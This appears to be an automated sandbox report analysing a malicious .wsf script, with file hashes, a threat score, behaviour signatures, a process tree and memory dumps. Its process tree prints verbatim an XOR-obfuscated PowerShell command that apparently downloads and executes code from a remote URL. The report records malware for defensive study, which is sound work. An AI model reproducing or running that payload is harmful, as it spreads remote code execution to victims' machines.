Overview

overview

10

Static

static

1

2e63fec516...d7.wsf

windows7-x64

8

2e63fec516...d7.wsf

windows10-2004-x64

10

Analysis

  • max time kernel
    15s
  • max time network
    113s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25-09-2024 07:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2e63fec5163d85af2caf87e31459a0d6cca4cdb3d65a797e00a62b0c2b76acd7.wsf

  • Size

    3KB

  • MD5

    e4895b941c8ea6d76630d6fcb2002292

  • SHA1

    9e3038c82fd6767bfa224f361400fc89cd8d0d89

  • SHA256

    2e63fec5163d85af2caf87e31459a0d6cca4cdb3d65a797e00a62b0c2b76acd7

  • SHA512

    22c79a4fec72693f34933c1845c2225ba33cc9c11dd320a819e1c397dfa2ecc92ad752302fe161f247fd217cc30ec28a2959126a24a95269191dbe1fc473ea76

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e63fec5163d85af2caf87e31459a0d6cca4cdb3d65a797e00a62b0c2b76acd7.wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2728
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2900

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    111e8aee04032864be0166ea5e51cfc8

    SHA1

    a1ea4ca85a4d456065fc74784fba0eb563724101

    SHA256

    75a7ad836373462d2b462d5336ddffc3db25ea7572e9e239d02c4fc8dd7157e1

    SHA512

    ccdfb9a46b8159d37f34cba06076a0e0f149ec64833a078e8c4f4b9222ff77a73a42535a0391f18f8edab9f2b59f45e39d785f024af00de5718fe8066e10b213

    Download Submit

  • memory/2728-4-0x000007FEF621E000-0x000007FEF621F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2728-5-0x000000001B3C0000-0x000000001B6A2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2728-6-0x0000000001E50000-0x0000000001E58000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2728-7-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2728-8-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2728-9-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2728-10-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2728-11-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2728-12-0x000007FEF621E000-0x000007FEF621F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2728-13-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2728-22-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

    Download